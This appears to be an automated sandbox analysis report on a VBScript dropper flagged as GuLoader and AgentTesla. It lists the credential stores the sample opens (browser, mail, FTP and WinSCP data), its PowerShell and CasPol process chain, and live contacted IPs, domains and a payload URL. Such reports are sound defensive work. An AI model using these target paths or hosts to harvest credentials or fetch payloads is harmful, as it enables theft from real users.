Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 6072, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 6072, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 6072, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 755115 Sample: Richiesta urgente.vbs Startdate: 28/11/2022 Architecture: WINDOWS Score: 100 38 Multi AV Scanner detection for domain / URL 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 Yara detected GuLoader 2->42 44 5 other signatures 2->44 8 wscript.exe 1 1 2->8         started        process3 signatures4 54 VBScript performs obfuscated calls to suspicious functions 8->54 56 Wscript starts Powershell (via cmd or directly) 8->56 58 Obfuscated command line found 8->58 60 Very long command line found 8->60 11 powershell.exe 23 8->11         started        15 cmd.exe 1 8->15         started        process5 file6 32 C:\Users\user\AppData\...\2vgl23kr.cmdline, Unicode 11->32 dropped 62 Tries to detect Any.run 11->62 17 CasPol.exe 15 11 11->17         started        21 csc.exe 3 11->21         started        24 conhost.exe 11->24         started        26 conhost.exe 15->26         started        signatures7 process8 dnsIp9 34 qwedft.gq 162.240.62.179, 49709, 80 UNIFIEDLAYER-AS-1US United States 17->34 36 ftp.mcmprint.net 185.31.121.136, 21, 49711 RAX-ASBG Bulgaria 17->36 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->46 48 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 17->48 50 Tries to steal Mail credentials (via file / registry access) 17->50 52 5 other signatures 17->52 30 C:\Users\user\AppData\Local\...\2vgl23kr.dll, PE32 21->30 dropped 28 cvtres.exe 1 21->28         started        file10 signatures11 process12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
162.240.62.179
 qwedft.gq United States
46606 UNIFIEDLAYER-AS-1US false
185.31.121.136
 ftp.mcmprint.net Bulgaria
199364 RAX-ASBG false

Contacted Domains

Name IP Active
qwedft.gq 162.240.62.179 true
ftp.mcmprint.net 185.31.121.136 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://qwedft.gq/nnslx/arPdDEHecKTUsOQSyN133.asi false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown